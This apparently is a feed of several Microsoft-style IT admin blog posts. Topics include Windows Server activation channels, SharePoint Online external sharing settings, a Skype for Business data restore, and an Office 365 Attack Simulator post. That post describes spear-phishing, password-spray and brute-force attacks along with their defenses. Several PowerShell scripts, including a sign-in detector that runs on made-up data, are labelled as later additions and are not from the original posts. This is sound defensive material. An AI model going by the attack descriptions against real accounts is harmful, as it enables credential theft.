Well, I headed back to my SLMGR command to figure out how to get these monsters activated. This time I'm going to use the /IPK switch, which will allow me to install a product key. I went to this site to get the appropriate keys for my Standard version of Windows Server 2016. Some of my servers are Datacenter, but I need to fix this one first.


I used the /IPK switch to install a product key, choosing the Windows Server 2016 Standard key


From here on out I only captured results from my Datacenter experiences, but they were the same. I used the /ATO switch to force the activation. We get the awesome message that the product has been activated successfully!


Using the /DLV switch again we can see that now we have been activated by Active Directory.


Now, what had gone wrong? Why did I have to remove the installed key and add those generic keys to get these machines to activate properly? Why did the other dozen or so machines activate with no issues? As I said earlier, I missed something key in the initial stages of looking at the issue. I was thoroughly confused, so reached out to Charity from the initial blog post to see if she could help me. She saw the problem right away and helped me understand what I had missed early on.

When I ran the first /DLV switch, in the description was the key. The description was Windows® Operating System, RETAIL Channel. I had looked at that and thought that RETAIL Channel meant that it had been purchased and was a valid key.


When we look at the output of the /DLV switch from a properly activated server, notice the description now states VOLUME_KMSCLIENT channel. This lets us know that it is indeed a volume license.


So what does that RETAIL channel mean then? Well, it means the media that was used to install the operating system was an MSDN ISO. I went back to my customer and asked if, by some chance, there was a second Windows Server 2016 ISO floating around the network. Turns out that yes, there was another ISO on the network, and it had been used to create the other dozen machines. They compared the two ISOs and sure enough the one that was given to me to build the virtual servers was, in fact, an MSDN ISO. They removed that MSDN ISO from their network and now we have all our existing servers activated and no more worries about the activation failing on future builds.
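The check the post arrives at the hard way, as an added example that is not the post's own code: it reads the license channel from the same data slmgr /dlv shows (the SoftwareLicensingProduct WMI class), flags installs that report RETAIL rather than VOLUME_KMSCLIENT, and with -Fix overwrites the retail key using /ipk and re-runs /ato, the sequence that worked above. The GVLK table is a placeholder to fill from Microsoft's published KMS client setup keys list (the post does not print its keys), and the computer list and the SRV lookup against the user's DNS domain are assumptions.

```powershell
# Added example, not code from the original post: find Windows installs whose license
# channel is RETAIL (MSDN/retail media) rather than VOLUME_KMSCLIENT and, optionally,
# switch them to the KMS client setup key so ADBA can activate them. Run elevated.
param(
    [string[]]$ComputerName = @($env:COMPUTERNAME),   # assumption: the servers to check
    [switch]$Fix
)

# KMS client setup keys (GVLKs) are published by Microsoft; fill these in from that list.
# Placeholders only: the post does not show the keys it used.
$Gvlk = @{
    'ServerStandard'   = '<Windows Server 2016 Standard GVLK>'
    'ServerDatacenter' = '<Windows Server 2016 Datacenter GVLK>'
}

# Same check as NSLOOKUP -type=all _vlmcs._tcp: the KMS host(s) and the DCs should be listed.
Resolve-DnsName -Name "_vlmcs._tcp.$env:USERDNSDOMAIN" -Type SRV -ErrorAction SilentlyContinue |
    Where-Object { $_.NameTarget } | Select-Object NameTarget, Port | Format-Table -AutoSize

foreach ($computer in $ComputerName) {
    # SoftwareLicensingProduct backs slmgr /dlv. Only the installed key has a PartialProductKey,
    # which filters out the dozens of inactive SKU entries Windows also lists.
    $product = Get-CimInstance -ComputerName $computer -ClassName SoftwareLicensingProduct |
        Where-Object { $_.PartialProductKey -and $_.Name -like 'Windows*' } | Select-Object -First 1
    if (-not $product) { Write-Warning "$computer : no installed Windows product key found"; continue }

    # The Description carries the channel text the post keyed on.
    $channel = switch -Regex ($product.Description) {
        'VOLUME_KMSCLIENT' { 'VOLUME_KMSCLIENT'; break }
        'RETAIL'           { 'RETAIL'; break }
        default            { 'OTHER' }
    }

    [pscustomobject]@{
        Computer      = $computer
        Edition       = $product.Name
        Channel       = $channel
        LicenseStatus = $product.LicenseStatus   # 1 = Licensed; anything else needs attention
        PartialKey    = $product.PartialProductKey
    }

    if ($Fix -and $channel -eq 'RETAIL') {
        # Edition names look like 'Windows(R), ServerStandard edition'; map to the GVLK table.
        $edition = $Gvlk.Keys | Where-Object { $product.Name -match $_ } | Select-Object -First 1
        if (-not $edition) { Write-Warning "$computer : no GVLK mapped for '$($product.Name)'"; continue }

        # /ipk overwrites the retail key in place (safer than /upk, which leaves no key if the
        # box reboots), /ato then activates against AD, /dlv confirms the VOLUME_KMSCLIENT channel.
        Invoke-Command -ComputerName $computer -ArgumentList $Gvlk[$edition] -ScriptBlock {
            param($key)
            $slmgr = Join-Path $env:windir 'System32\slmgr.vbs'
            cscript.exe //nologo $slmgr /ipk $key
            cscript.exe //nologo $slmgr /ato
            cscript.exe //nologo $slmgr /dlv
        }
    }
}
```

Run it against the servers built from the suspect ISO: a Channel of RETAIL with a LicenseStatus other than 1 is exactly the state the post's virtual machines were in, and the report makes the retail-media builds stand out from the volume-media builds that activated without help.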

I hope this has been helpful and may save you some time going forward!

Mike

SharePoint Online External Sharing Demystified (Part 2): Allow sharing only with the external users that already exist in your organization’s directory


Hi this is the 2nd of 4 blogs on SharePoint Online External Sharing of sites.

Here is a mini table of contents

The settings in the screenshot below are accessible via a Global admin OR a SharePoint Admin (meaning someone who has been granted access to the SharePoint Admin center BY a Global Admin). The location is as follows: O365 Portal>>SharePoint admin>>Sharing

Once this option is selected this next screen pops up as a reminder of the fact that SharePoint Site collections also have individual sharing settings that you can set. These SharePoint site collection settings RESPECT the settings of the SharePoint Admin Center. So, this is a reminder and you would click OK to proceed knowing that any site collections that previously had sharing settings enabled will be re-activated since you are activating it at the SharePoint Admin center level.

Now, I'd like to talk a bit about these site collection specific sharing settings, because if you don't set them in line with your SharePoint Admin settings, you could waste a lot of time trying to figure out why your settings in the Admin center are not taking effect. These site collection settings are also set in the SharePoint Admin center, but they are located here: O365 Portal>>SharePoint Admin>>Site Collections. Then you click on a specific site collection and click the 'Sharing' icon.

 

This then brings up an additional set of Sharing settings that look exactly like the SharePoint admin settings except they apply specifically to a site collection.

NOTE: Now here is where it can get confusing. If your SharePoint Admin center is set to anything other than 'Don't allow sharing outside your organization' BUT your Site Collection is set to the setting you see above, when you go to share the site collection, you will experience the Scenario 1 in my previous blog. You will NOT be able to share it. I wasted a lot of time one late night trying to figure out why I could not share a site because I had set my SharePoint Admin settings to 'Allow sharing only with the external users that already exist in your organizations' directory', then I discovered my site collection specific sharing settings was set to a lower setting. Those lower settings of the site collection ARE RESPECTED over the SharePoint Admin settings.

So after I set my Site collection sharing settings to match my SharePoint Admin settings of 'Allow sharing only with the external users that already exist in your organization's directory' the following experience applies.

At this point, even if a site owner tries to share the site with an external user it will not work per the setting because the external user has not been added to Azure AD yet. So the site owner will receive this screen.

I then proceeded to add the external account to Azure AD.

The external user must then accept the email invitation as seen below.

As a global admin, I verified that the external Hotmail account is now in Azure AD as well as the o365 portal.

NOTE: As a side note, if you delete a user from Azure AD they are automatically deleted from the O365 portal as well.

Now when the site owner shares a site with the external user, you will still see the user is not found. Just proceed to send the invite, it will work.

This next screen validates my statement. The site owner will see a notification that displays a message 'Shared with: whomever@hotmail.com'. From a SharePoint perspective, the user has been granted permissions to the site.

 

This final screen is what the external user sees when now trying to browse to the site. SUCCESS!!!

PowerPivot for SharePoint 2016 – Scheduled Data Refresh error: “The virtual path ‘/……xlsx’ maps to another application, which is not allowed.”


You may receive the following error when running a scheduled data refresh of a PowerPivot workbook in SharePoint 2016:

The virtual path '/......xlsx' maps to another application, which is not allowed.

After this error occurs, the schedule is disabled and the schedule settings are deleted. The schedule keeps getting disabled even if subsequent scheduled refreshes run successfully.

This error is caused by a bug in PowerPivot. The fix will be released in the sppowerpivot16.msi file in the Feature Pack for the upcoming release of SQL Server 2016 SP2.

SharePoint Online External Sharing Demystified (Part 1): Don’t allow sharing outside your organization


Hi everyone, a lot of customers have questions about SharePoint Online external sharing of sites. What happens when I check this box? I've enabled external sharing but I still can't share externally. I've gone through the current four scenarios with screenshots in the hope that it will demystify some of these settings. This is the first of 4 blogs on this subject, one for each of the admin settings below.

Here is a mini table of contents

Scenario 1: Don't allow sharing outside your organization

Note: The settings in the screenshot below are accessible via a Global admin OR a SharePoint Admin (meaning someone who has been granted access to the SharePoint Admin center BY a Global Admin). The location is as follows: O365 Portal>>SharePoint admin>>Sharing'

The owner of a site tries to share with a Hotmail account and, as expected, is prevented from doing so, hence the red warning text below.

I went a step further and, as the Global Admin, added the Hotmail account to Azure AD just to see what would happen

I then logged into the Hotmail account as the test External user and made sure to accept the email invitation

After the external user accepts the invite they are automatically added to the O365 portal as a Guest account as you can see here from this screenshot

Just as before, when the site owner tries to share with the Hotmail account they are prevented from doing so. So my point was, even if the external user was added to AD the setting of Don't Allow Sharing Outside your Organization still prevented the site from being shared.

External Sharing Matrix


This matrix was put together by my fellow PFE colleague Kevin Kirkpatrick. You can view his blog here.

This matrix provides the 4 different external sharing options as well as the PowerShell equivalent to set them.

For each option: what it is for, and the PowerShell equivalent (the SharingCapability value).

Don't allow sharing outside your organization
  Use it to: Prevent all users on all sites from sharing sites or sharing content on sites with external users. Users will not be able to share sites or content with external users, even if those users are already in your directory.
  PowerShell equivalent: Disabled

Allow sharing only with the external users that already exist in your organization's directory
  Use it to: Allow sharing only for external users who are already in your directory. These users may exist in your directory because they previously accepted sharing invitations or because they were manually imported. (You can tell an external user because they have #EXT# in their user name.)
  PowerShell equivalent: ExistingExternalUserSharingOnly

Allow external users who accept sharing invitations and sign in as authenticated users
  Use it to: Require external users who have received invitations to view sites or content to sign in with a Microsoft account before they can access the content.
      • Site owners or others with full control permission can share sites with external users.
      • Site owners or others with full control permissions on a site can share documents with external users by requiring sign-in.
      • All external users will be required to sign in before they can view content.
      • Invitations to view content can be redeemed only once. After an invitation has been accepted, it cannot be shared or used by others to gain access.
  In addition, this sharing setting allows the new secure sharing experience (secure links).
  PowerShell equivalent: ExternalUserSharingOnly

Allow both external users who accept sharing invitations and guest links
  Use it to: Allow site users to share sites with people who sign in as authenticated users, while also allowing site users to share documents through anonymous guest links, which do not require invited recipients to sign in.
      • Site owners or others with full control permissions can share sites with external users.
      • All external users will be required to sign in before they can view content on a site that has been shared.
      • When sharing documents, site owners or others with full control permissions can opt to require sign-in or send an anonymous guest link.
      • When users share a document, they can grant external users either view or edit permissions to the document.
      • External users who receive anonymous guest links can view or edit that content without signing in.
      • Anonymous guest links could potentially be forwarded or shared with other people, who might also be able to view or edit the content without signing in.
  PowerShell equivalent: ExternalUserAndGuestSharing
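The tenant versus site collection mismatch that Part 2 describes, expressed with the PowerShell equivalents from the matrix above, as an added example that is neither the post's nor Kevin Kirkpatrick's code: it reads the tenant-level SharingCapability, compares every site collection against it using the matrix ordering from most to least restrictive, and reports the sites where the site collection setting is stricter, which is the case where the Admin center says sharing is allowed but the site owner still cannot share. The admin URL is a placeholder for your tenant, the SharePoint Online Management Shell is assumed to be installed, and nothing is changed unless -Align is passed.

```powershell
# Added example, not from the post or the matrix author: report site collections whose
# sharing setting is more restrictive than the tenant-level setting, and optionally align them.
param(
    [string]$AdminUrl = 'https://contoso-admin.sharepoint.com',   # assumption: your tenant admin URL
    [switch]$Align
)

# Most restrictive first; the same order as the matrix above.
$order = @('Disabled', 'ExistingExternalUserSharingOnly', 'ExternalUserSharingOnly', 'ExternalUserAndGuestSharing')

Connect-SPOService -Url $AdminUrl
$tenantCap  = [string](Get-SPOTenant).SharingCapability
$tenantRank = [array]::IndexOf($order, $tenantCap)
Write-Host "Tenant sharing capability: $tenantCap"

$report = foreach ($site in Get-SPOSite -Limit All) {
    $siteCap  = [string]$site.SharingCapability
    $siteRank = [array]::IndexOf($order, $siteCap)
    # The effective setting is the stricter of the two: a site collection cannot exceed the
    # tenant, and a stricter site collection setting wins over a more permissive tenant setting.
    $effective = $order[[Math]::Min($tenantRank, $siteRank)]
    [pscustomobject]@{
        Url       = $site.Url
        Site      = $siteCap
        Tenant    = $tenantCap
        Effective = $effective
        Mismatch  = ($siteRank -lt $tenantRank)
    }
}

# These are the sites where "I enabled external sharing but still can't share" will be reported.
$report | Where-Object Mismatch | Format-Table -AutoSize

if ($Align) {
    foreach ($row in ($report | Where-Object Mismatch)) {
        # Raise the site collection to the tenant value. Skip sites you locked down on purpose;
        # a stricter site collection is only a problem when it is unintended.
        Set-SPOSite -Identity $row.Url -SharingCapability $tenantCap
    }
}
```

Run it without -Align first: the Effective column shows what a site owner will actually experience, and a row with Mismatch set to True is the late-night scenario from Part 2, where the tenant allows sharing with existing external users but the site collection still refuses.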

Windows Server 2019 preview announced!


A preview of Windows Server 2019 was recently announced; it will become generally available in the second half of 2018.

Starting now, customers can get access to the preview build through the Insiders program.

Windows Server 2019 builds on the solid foundation of Windows Server 2016.
We spent a lot of time studying customer feedback to understand future trends, market needs and how business will transform.

The four main areas are hybrid infrastructure, security, Application Platform and hyper-converged infrastructure.

We are bringing numerous innovations in these four areas to Windows Server 2019.

We know that moving to the cloud is a journey, and often a hybrid approach that combines on-premises and cloud environments working together is what makes sense and forms the basis for improving our customers' business.

Extending Active Directory, synchronizing file servers and backing up to the cloud are just a few examples of what customers are already doing today to move their data centers toward the public cloud.

In addition, the hybrid approach also lets applications running on-premises take advantage of cloud innovations such as artificial intelligence and IoT.

The hybrid cloud provides a forward-looking, long-term approach. That is why we see it playing a central role in cloud strategies for the foreseeable future.

Read more in the blog.

Office 365 Attack Simulator and Mitigating Common Attacks (Part 1)


When it comes to security, your best line of defense is a proactive one rather than a reactive one; but how do you know how you will respond to a security incident if one has not yet occurred? That is where Attack Simulator in Office 365 shines, and it is part of what sets the security solutions we provide apart from other cloud services.

Attack Simulator is designed to put you ahead of the curve and keep you in front of the proverbial 8 ball. With Attack Simulator you can run realistic attack scenarios in your organization. This can help you identify vulnerable users before a real attack impacts your bottom line.

In brief, Attack Simulator as a component of Office 365 Security and Compliance is designed to help you identify issues before they become an issue.  It allows you to determine how end users behave in the event of an attack, and update policies to ensure that appropriate security tools are in place to protect your organization from threats.

Getting Started

Attack Simulator is available as Preview in Office 365 E5 Plans.  The Preview version of Attack Simulator allows you to simulate:

  • Display name spear-phishing attacks
  • Password-spray attacks
  • Brute-force password attacks

To skip ahead and learn how to get started with Attack Simulator visit https://support.office.com/en-us/article/attack-simulator-office-365-da5845db-c578-4a41-b2cb-5a09689a551b.

Display Name Spear-Phishing Attacks

Spear-phishing attacks are designed to play on the trust of a user or users.  The most common spear-phishing attacks involve some level of sophistication, such as understanding influencers within an organization that generate trust amongst potential recipients of email from that individual.

Using Attack Simulator you can simulate this type of attack by creating messages that appear to have originated from such individuals by changing the display name and source address.

The most common objective by bad actors when implementing spear-phishing attacks are to gain access to users' credentials.

In addition to spoofing the sender (display name) and crafting the message body, attackers also use document phishing to lure users into giving up their credentials, for example by sending spam to many harvested email addresses with content that tries to get the user to click a provided link or open a provided attachment. The victim of such a phishing attack may be directed to a legitimate-looking website that masquerades as an online bank or corporate mail service, and any credentials entered there are captured on the masquerading web server.

Protect Users from Phishing/Spear Phishing with Office 365 Advanced Threat Protection

Office 365 Advanced Threat Protection allows you to configure anti-phishing policies to protect your users.

The anti-phishing capabilities in ATP apply a set of machine learning models together with impersonation detection algorithms to incoming email messages, providing protection against both spear and commodity phishing attacks. All messages are subject to an extensive set of machine learning models trained to detect phishing messages, together with a set of advanced algorithms used to protect against various user and domain impersonation attacks.

Learn more on using ATP to prevent phishing attacks at https://support.office.com/en-us/article/atp-anti-phishing-capabilities-in-office-365-5076d0f6-7a59-4d6c-bd07-ba95033f0682?ui=en-US&rs=en-US&ad=US.

ATP capabilities such as Spoof Intelligence and Safe Links/Safe Attachments can also be used to further protect users from impersonation, malicious hyperlinks in a message, and malware and viruses.

For a complete list of protected scenarios refer to the ATP service description at https://technet.microsoft.com/en-us/library/exchange-online-advanced-threat-protection-service-description.aspx.

In addition, consider adding DKIM (DomainKeys Identified Mail) signatures to your domains so recipients know that email messages came from users in your organization and weren't modified after they were sent to help protect both senders and recipients from forged and phishing email.

Learn more about DKIM at https://technet.microsoft.com/en-US/library/ms.exch.eac.DKIMDisabled(EXCHG.150).aspx?v=15.20.609.10&l=1&s=BPOS_S_E15_0.

Password-Spray Attacks

Password-spraying is a method of attempting to login with only one password across all domain accounts.  It's an alternative to brute-force password attacks that is designed to mitigate account lockouts where a lockout threshold is in place.

This allows an attacker to attempt many more authentication attempts without locking out users. For example, if I were to attempt to login to every account with the password ‘pass@word1’ it is very likely (hopefully not ;-)) that someone at the target organization used that password and I will now have access to their account.

Simplified, password-spraying is essentially a reverse brute-force attack in that as opposed to attempting many password attempts against a single known user, it involves a single, strategic password, used across many known users.

In the Microsoft cloud we handle billions of sign-ins each day and our security detection algorithms allow us to both detect and subsequently block attacks such as these in real-time.

Some of these capabilities include:

Smart Lockout

Azure Active Directory (Azure AD) protects against password attacks with Smart Lockout.  Smart Lockout differentiates between sign-in attempts that look like they’re from a valid user and sign-ins from what may be an attacker. Smart Lockout ensures potential attackers are locked out without impacting a valid user which helps to prevent denial of service on the user and stops password spray attacks.

IP Lockout

IP lockout works by analyzing sign-ins to assess the quality of traffic from each IP address hitting Microsoft systems. Using that data, IP lockout finds IP addresses acting maliciously and blocks those sign-ins in real time.

Password-Spray Attack Prevention

A password is the key to accessing an account, but in a successful password spray attack, the attacker has guessed the correct password.  The best solution to mitigating password spray attacks is using something more than just a password to distinguish between the account owner and the attacker. For example:

Implement Multi-Factor Authentication

Azure AD Identity Protection uses sign-in data and adds on advanced machine learning and algorithmic detection to risk score every sign-in that comes in to the system. This enables you to create policies in Identity Protection that prompt a user to authenticate with a second factor if and only if there’s risk detected for the user or for the session.

Learn more about Azure AD Identity Protection at https://docs.microsoft.com/en-us/azure/active-directory/active-directory-identityprotection.

For an additional layer of security, you can use Azure MFA to require multi-factor authentication for your users all the time, both for cloud authentication and for AD FS.

Learn more about Azure Multi-Factor Authentication at https://docs.microsoft.com/en-us/azure/multi-factor-authentication/multi-factor-authentication, and how to configure Azure MFA for AD FS at https://docs.microsoft.com/en-us/windows-server/identity/ad-fs/operations/configure-ad-fs-and-azure-mfa.

Azure MFA as primary authentication

In AD FS 2016, you have the ability to use Azure MFA as the primary authentication method for passwordless authentication, which helps protect against password-spray and password-theft attacks. Using Azure MFA as primary authentication removes the need for a password, which means there is no password for an attacker to guess. With Azure MFA you can also use a password as the second factor, accepted only after your OTP has been validated with Azure MFA. Learn more about using a password as the second factor at https://github.com/Microsoft/adfsAuthAdapters.

Brute-Force Password Attack

Perhaps one of the more archaic attacks, brute-force attacks consist of an attacker trying many passwords or passphrases with the hope of eventually guessing correctly. The attacker systematically checks all possible passwords and passphrases until the correct one is found.

Brute-Force Password Attack Prevention

As with password-spray attacks, the same recommendations above apply, in addition to detection and handling through capabilities such as Cloud App Security.

Cloud App Security is a comprehensive solution that can help you as you move to take advantage of cloud applications while keeping you in control, through improved visibility into activity and increased protection of critical data across cloud applications. Cloud App Security provides tools that help uncover shadow IT, assess risk, enforce policies, investigate activities, and stop threats, to help you move to the cloud more safely while maintaining control of critical data.

Through Office 365 Cloud App Security you can, for example, use the Multiple failed user log on attempts to an app policy template to be alerted when a single user attempts to log on to a single app, and fails more than n times within a defined number of minutes.
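The two detections this post describes in prose, the password spray (one source, many accounts, few attempts each) and the brute force (one source, one account, many attempts, the shape of the Cloud App Security "Multiple failed user log on attempts" template), run over a constructed sample of sign-in events. This is an added example, not the post's code or the product's logic; the event fields are modelled on what Azure AD sign-in logs expose (time, user, source IP, result), the sample data is made up, and the window and thresholds are assumptions to tune against your own baseline.

```powershell
# Added example, not from the original post: spray and brute-force detection over sign-in
# events. Sample data below is constructed, not real; thresholds are assumptions.
$Window        = [TimeSpan]::FromMinutes(30)
$SprayMinUsers = 5    # distinct accounts one IP must fail against inside the window
$BruteMinFails = 10   # failures against one account from one IP inside the window

# Constructed sample: 203.0.113.10 sprays five accounts then succeeds as frank; 198.51.100.7
# hammers grace; 192.0.2.44 is alice mistyping her password once and then signing in.
$SignIns = @'
time,user,ip,result
2018-03-20T08:00:05Z,alice@contoso.com,203.0.113.10,Failure
2018-03-20T08:00:09Z,bob@contoso.com,203.0.113.10,Failure
2018-03-20T08:00:14Z,carol@contoso.com,203.0.113.10,Failure
2018-03-20T08:00:20Z,dave@contoso.com,203.0.113.10,Failure
2018-03-20T08:00:27Z,erin@contoso.com,203.0.113.10,Failure
2018-03-20T08:00:33Z,frank@contoso.com,203.0.113.10,Success
2018-03-20T08:05:00Z,grace@contoso.com,198.51.100.7,Failure
2018-03-20T08:05:02Z,grace@contoso.com,198.51.100.7,Failure
2018-03-20T08:05:04Z,grace@contoso.com,198.51.100.7,Failure
2018-03-20T08:05:06Z,grace@contoso.com,198.51.100.7,Failure
2018-03-20T08:05:08Z,grace@contoso.com,198.51.100.7,Failure
2018-03-20T08:05:10Z,grace@contoso.com,198.51.100.7,Failure
2018-03-20T08:05:12Z,grace@contoso.com,198.51.100.7,Failure
2018-03-20T08:05:14Z,grace@contoso.com,198.51.100.7,Failure
2018-03-20T08:05:16Z,grace@contoso.com,198.51.100.7,Failure
2018-03-20T08:05:18Z,grace@contoso.com,198.51.100.7,Failure
2018-03-20T08:10:00Z,alice@contoso.com,192.0.2.44,Failure
2018-03-20T08:10:30Z,alice@contoso.com,192.0.2.44,Success
'@ | ConvertFrom-Csv | ForEach-Object {
    [pscustomobject]@{ Time = [datetime]$_.time; User = $_.user; Ip = $_.ip; Result = $_.result }
}

function Get-PeakWindow {
    # Two-pointer scan over time-sorted events: evaluates $Measure on every $Window-long span
    # starting at each event and returns the largest value with that span's start time.
    param([object[]]$Sorted, [TimeSpan]$Window, [scriptblock]$Measure)
    $best = [pscustomobject]@{ Value = 0; Start = $null }
    $j = 0
    for ($i = 0; $i -lt $Sorted.Count; $i++) {
        while ($j -lt $Sorted.Count -and ($Sorted[$j].Time - $Sorted[$i].Time) -le $Window) { $j++ }
        $value = & $Measure @($Sorted[$i..($j - 1)])
        if ($value -gt $best.Value) { $best = [pscustomobject]@{ Value = $value; Start = $Sorted[$i].Time } }
    }
    $best
}

function Find-PasswordSpray {
    # Spray signature: one source IP, many distinct accounts. Any account that later succeeded
    # from the same IP is reported as the likely compromised one.
    param([object[]]$Events, [TimeSpan]$Window, [int]$MinUsers)
    $failures = $Events | Where-Object Result -eq 'Failure'
    foreach ($group in ($failures | Group-Object Ip)) {
        $sorted = @($group.Group | Sort-Object Time)
        $peak = Get-PeakWindow -Sorted $sorted -Window $Window -Measure { param($span) @(@($span).User | Sort-Object -Unique).Count }
        if ($peak.Value -ge $MinUsers) {
            $ip = $group.Name
            $hits = @($Events | Where-Object { $_.Ip -eq $ip -and $_.Result -eq 'Success' -and $_.Time -ge $peak.Start } |
                      Select-Object -ExpandProperty User -Unique)
            [pscustomobject]@{ Alert = 'PasswordSpray'; Ip = $ip; DistinctUsers = $peak.Value; WindowStart = $peak.Start; SucceededAs = ($hits -join ', ') }
        }
    }
}

function Find-BruteForce {
    # Brute-force signature: many failures against a single account from one source IP.
    param([object[]]$Events, [TimeSpan]$Window, [int]$MinFailures)
    $failures = $Events | Where-Object Result -eq 'Failure'
    foreach ($group in ($failures | Group-Object Ip, User)) {
        $sorted = @($group.Group | Sort-Object Time)
        $peak = Get-PeakWindow -Sorted $sorted -Window $Window -Measure { param($span) @($span).Count }
        if ($peak.Value -ge $MinFailures) {
            [pscustomobject]@{ Alert = 'BruteForce'; Ip = $sorted[0].Ip; User = $sorted[0].User; Failures = $peak.Value; WindowStart = $peak.Start }
        }
    }
}

$alerts = @(Find-PasswordSpray -Events $SignIns -Window $Window -MinUsers $SprayMinUsers) +
          @(Find-BruteForce   -Events $SignIns -Window $Window -MinFailures $BruteMinFails)
$alerts | Format-List
```

On the sample this raises exactly two alerts: a PasswordSpray for 203.0.113.10 across five accounts with frank listed under SucceededAs, and a BruteForce for grace from 198.51.100.7 with ten failures; alice's single mistyped password from 192.0.2.44 stays below both thresholds. The point of keying the spray on distinct users per source rather than on failures per user is the one the post makes: a spray stays under any per-account lockout threshold, so a per-account rule never sees it.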

Learn more about Cloud App Security at https://docs.microsoft.com/en-us/cloud-app-security/what-is-cloud-app-security.

Lastly, enforcing strong passwords and account lockout policies can help to mitigate brute-force attacks.  For more information see also https://docs.microsoft.com/en-us/azure/active-directory/active-directory-passwords-policy.

Conclusion

Your security is only as good as what you put into it. Using Attack Simulator you can better understand how your users will react and then implement the best set of solutions to ensure both your organization's and your users' security. While this article is not intended to provide a comprehensive view of all of the security options available in Office 365, it helps map those capabilities to the simulations available in Attack Simulator. To learn more about Attack Simulator visit https://support.office.com/en-us/article/attack-simulator-office-365-da5845db-c578-4a41-b2cb-5a09689a551b?ui=en-US&rs=en-US&ad=US.

Office 365, including SharePoint Online and OneDrive for Business, provides a broad set of controls to help keep your data safe no matter where users are when they access or share data, what device they're working on, and how secure their network connection is. Through these controls you can customize the level of access granted to users while making sure the resulting constraints meet your organizational security requirements.

For additional information on protecting yourself against threats in Office 365 refer to https://support.office.com/en-us/article/protect-against-threats-in-office-365-b10023f6-f30f-45d3-b3ad-b71aa4aa0d58.  This article will help you protect your organization against a variety of threats, including spoofing, malware, spam, phishing attempts, and unauthorized access to data.

Next up, Part 2 Using Attack Simulation and Configuring Security Options...

 

Skype for business 2015 – Recover user data from SQL backup restore


This blog may be helpful as a reference when recovering user data from the back-end rtcxds database via a SQL restore. I have seen many cases in which user data is either corrupted or lost due to various circumstances. I have two SFB 2015 pools in my lab; the rtcxds database lives on SQL.green.com. I am restoring the database to another SQL server and recovering the user data from it.

I hope you are taking a SQL backup of the rtcxds database on a regular basis. If not, please plan SQL backups in your environment.

Currently I am using the SQL Express instance on my SFB FE server to restore the rtcxds database. You can also use another SQL server in your setup. Please note that SQL Server Express 2012/2014 has a 10 GB database size limit; if your database is larger than 10 GB, restore to a non-Express edition of SQL Server.

Copy the SQL backup data and log file to the FE server. Create a blank rtcxds database on the SFB FE server. Right-click the blank rtcxds database > Tasks > Restore > Database. Edit the database path and make sure the correct restore path is selected.

The rtcxds restore completed on the FE server and the database is mounted.

Open SFB management shell and run following command. This command will export the user data from restored rtcxds database to a zip file.

Export-CsUserData -SqlInstanceName "Fe.domain.com\rtclocal" -DbName rtcxds -FileName C:\backup.zip

You can import the data for all users or for selected users into the blob store. Use either Import-CsUserData or Update-CsUserData depending on the requirement. Note that Update-CsUserData does not require an FE service restart.

Import-CsUserData -PoolFqdn pool.domain.com -FileName C:\backup.zip

Update-CsUserData -FileName "C:\backup.zip" -UserFilter "user@domain.com"

If your rtcxds database is down, you can create a new database using below command and import the user data.

Install-CsDatabase -Update -SqlServerFqdn sql.domain.com -ConfiguredDatabases
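The restore-then-export procedure above, scripted end to end, as an added example that is not the post's own code: it restores the .bak onto the front end's RTCLOCAL instance under a separate database name (so a live rtcxds on the same instance is never overwritten), reads the logical file names from the backup instead of guessing them for the MOVE clauses, exports the user data with Export-CsUserData, sanity-checks the archive, and updates only the listed users. It assumes the SqlServer module (for Invoke-Sqlcmd) and the Skype for Business Management Shell are loaded on the FE, and every path, instance name and user in the param block is a placeholder to adjust.

```powershell
# Added example, not from the original post: restore a copy of rtcxds from a SQL backup and
# recover selected users' data from it. Names and paths below are assumptions.
param(
    [string]$Instance   = "$env:COMPUTERNAME\rtclocal",   # assumption: FE's local SQL Express instance
    [string]$BackupFile = 'C:\restore\rtcxds.bak',        # assumption: the .bak copied to the FE
    [string]$DataDir    = 'C:\restore\data',              # assumption: where restored mdf/ldf go
    [string]$ExportZip  = 'C:\restore\userdata.zip',
    [string[]]$Users    = @('user@domain.com')            # assumption: the users to recover
)

New-Item -ItemType Directory -Force -Path $DataDir | Out-Null

# The logical file names inside the backup decide the MOVE clauses; read them rather than guess.
$files = Invoke-Sqlcmd -ServerInstance $Instance -Query "RESTORE FILELISTONLY FROM DISK = N'$BackupFile'"
$moves = ($files | ForEach-Object {
    $ext = if ($_.Type -eq 'L') { 'ldf' } else { 'mdf' }
    "MOVE N'$($_.LogicalName)' TO N'$DataDir\$($_.LogicalName).$ext'"
}) -join ', '

# Restore under a different name so an existing rtcxds on this instance is left untouched.
$restoreDb = 'rtcxds_restore'
Invoke-Sqlcmd -ServerInstance $Instance -QueryTimeout 0 -Query @"
IF DB_ID(N'$restoreDb') IS NOT NULL ALTER DATABASE [$restoreDb] SET SINGLE_USER WITH ROLLBACK IMMEDIATE;
RESTORE DATABASE [$restoreDb] FROM DISK = N'$BackupFile' WITH $moves, REPLACE, RECOVERY;
"@

# Export the user data from the restored copy into the zip Import-/Update-CsUserData consume.
Export-CsUserData -SqlInstanceName $Instance -DbName $restoreDb -FileName $ExportZip

# Refuse to import from an empty archive; a failed export still produces a file.
if (-not (Test-Path $ExportZip) -or (Get-Item $ExportZip).Length -lt 1KB) {
    throw "Export produced no usable archive at $ExportZip"
}

# Put back only the affected users. Update-CsUserData does not need a front-end service restart.
foreach ($user in $Users) {
    Update-CsUserData -FileName $ExportZip -UserFilter $user
}
```

Keeping the restored copy under a separate name also means the exported archive can be inspected (and the restored database queried) before anything is written back to the pool, which is the safer order when the reason for the recovery was corruption rather than loss.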

I hope this blog may be helpful for reference. Please comment if you have any questions.

Microsoft TechNet Guru Winners – February 2018


All the votes (for February) are in!

 

Hope you like the new/evolving layout - to give more width to the judge's comments.

 

Don't forget, winners of these awards get the chance to win the highly coveted Ultimate TechNet Guru Ninja Pen!

 

A symbol of winners' erudition and technical rank.

Chiselled from sheer grit and buffed with Microsoft Love

As shown below, waved by some of our illustrious leaders.

 

READ MORE HERE

 

And so, as we come up to our FIVE YEAR ANNIVERSARY of the competition...

I am proud to present the TechNet Guru Awards, February 2018 !!!!

 

The TechNet Guru Awards celebrate the technical articles on TechNet, contributed from valued wiki authors like YOU!

Each month, the contributions are scored by a panel of judges (5 per category, 2-3 in each are MS experts), and the winners of each category are showered with love and attention from all corners of TechNet.

See the links at the bottom, to find out more about the competition and how to enter.

 

We have picked the top three highest scored contributions for each category to bestow our awards upon.

The awards are in gold, silver and bronze, the gold obviously being the top winner of the category.

The last column is just a few of the comments judges made during the judging process.

In some cases we have not obtained permission to use the judges' names, so they have been reduced to initials.

 

